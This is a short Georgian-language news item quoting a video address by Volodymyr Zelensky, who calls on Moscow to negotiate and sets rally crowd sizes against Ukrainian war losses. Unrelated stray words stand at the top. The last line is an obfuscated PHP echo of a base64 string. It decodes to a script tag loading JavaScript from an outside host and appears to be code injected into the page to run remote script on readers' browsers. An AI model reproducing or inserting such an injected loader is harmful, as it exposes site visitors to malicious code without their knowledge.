celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ, ცოტა ხნის წინ გავრცელებულ ვიდეომიმართვაში განაცხადა, რომ მოლაპარაკებები მშვიდობის მიღწევისთვის, რუსეთის გადარჩენისთვის ერთადერთი გამოსავალია. 
 
"ჩვენ ყოველთვის ვირჩევდით მოლაპარაკებებს და დიალოგს. მინდა, რომ ყველამ გამიგოს, განსაკუთრებით მოსკოვში - დადგა შეხვედრის და მოლაპარაკებების დრო. დადგა უკრაინის ტერიტორიული მთლიანობისა და სამართლიანობის აღდგენის დრო. წინააღმდეგ შემთხვევაში, ისეთი დანაკარგები გექნებათ, რომ ამის აღდგენას რამდენიმე თაობა ვერ შეძლებს. 
 
დღეს მოსკოვში ყირიმის მიტაცების ბევრი მიზეზი გაისმა, ჩაატარეს დიდი მიტინგიც. მინდა ყურადღება ერთ დეტალზე გავამახვილო - აქციაზე დაახლოებით 200 ათასი ადამიანი შეკრიბეს, ქუჩაში 100 ათასი იდგა, სტადიონზე კი დაახლოებით 95 ათასი. ზუსტად ამ რაოდენობის ჯარი შემოიჭრა უკრაინაში. ახლა წარმოიდგინეთ, 14 ათასი ცხედარი თქვენთან ერთად იმ სტადიონზე. კიდევ ათობით ათასი დაჭრილი და დასახიჩრებული ადამიანი. წარმოიდგინეთ, რამხელა დანაკარგი გაქვთ ამ შემოჭრისგან. ეს ომის საფასურია! 
 
ომი მოლაპარაკებების მაგიდასთან უნდა დასრულდეს!
 
უახლოეს დღეებში პარტნიორი ქვეყნების მოსახლეობისადმი მიმართვას გავაგრძელებ. ვგეგმავთ შვეიცარიელებისთვის, ასევე ისრაელის, იტალიის, იაპონიის მთავრობისა და მოქალაქეებისთვის მიმართვას. მსოფლიოს ესმის უკრაინის პოზიცია და მხარს უჭერს ჩვენს დამცველებს, უკრაინულ არმიას." – განაცხადა ვოლოდიმერ ზელენსკიმ.
 
1071
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");